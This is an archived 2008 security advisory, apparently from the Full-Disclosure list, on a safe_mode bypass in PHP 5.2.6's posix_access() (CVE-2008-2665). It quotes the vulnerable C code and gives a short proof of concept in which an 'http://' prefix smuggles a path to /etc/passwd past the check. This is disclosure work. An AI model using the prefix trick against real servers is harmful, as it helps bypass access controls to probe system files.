[Full-disclosure] PHP 5.2.6 posix_access() (posix ext) safe_mode bypass

2008-06-23 00:00:00
vulners.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.6 posix_access() (posix ext) safe_mode bypass]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com
Date:

    • Written: 10.05.2008
    • Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 54

CVE: CVE-2008-2665
CWE: CWE-264
SecurityRisk: Low

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/54
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl
with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web
developers to write dynamically generated pages quickly.

posix_access - Determine accessibility of a file

SYNOPSIS:

bool posix_access ( string $file [, int $mode ] )

http://pl2.php.net/manual/pl/function.posix-access.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL
VULNERABLE FUNCTIONS

--- 1. PHP 5.2.6 posix_access() safe_mode bypass ---

Let's look at the posix_access() function:

PHP_FUNCTION(posix_access)
{
    long mode = 0;
    int filename_len, ret;
    char *filename, *path;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename, &filename_len,
                              &mode) == FAILURE) {
        RETURN_FALSE;
    }

    /* the user-supplied name is resolved to an absolute path here ... */
    path = expand_filepath(filename, NULL TSRMLS_CC);

    if (!path) {
        POSIX_G(last_error) = EIO;
        RETURN_FALSE;
    }

    /* ... but the safe_mode check below is run on the raw filename, not on path */
    if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) ||
        (PG(safe_mode) && (!php_checkuid_ex(filename, NULL,
                                            CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))) {
        efree(path);
        POSIX_G(last_error) = EPERM;
        RETURN_FALSE;
    }

    /* the resolved path is what actually reaches access(2) */
    ret = access(path, mode);
    efree(path);

    if (ret) {
        POSIX_G(last_error) = errno;
        RETURN_FALSE;
    }

    RETURN_TRUE;
}


var_dump(posix_access("http://…/…/…/etc/passwd")); // bool(true)
var_dump(posix_access("/etc/passwd"));             // bool(false)

Why?

Because path = expand_filepath(filename, NULL TSRMLS_CC); resolves
"http://…/…/…/etc/passwd" to path=/etc/passwd, and that resolved path is what access() is called with.

The safe_mode check (PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR,
CHECKUID_NO_ERRORS))) is run on the raw, unresolved string "http://…/…/…/etc/passwd" instead. Because that
string starts with http://, php_checkuid_ex() treats it as a URL and lets it through, so safe_mode is bypassed.

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL
VULNERABLE FUNCTIONS

iD8DBQFIWCC+W1OhNJH6DMURAsq4AJ0eC1qKOZVOJJB3XDRIhpufNe1qUwCfTWv0
n4Sg31DePRpr4h3PLouKFoA=
=6qwD
-----END PGP SIGNATURE-----


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/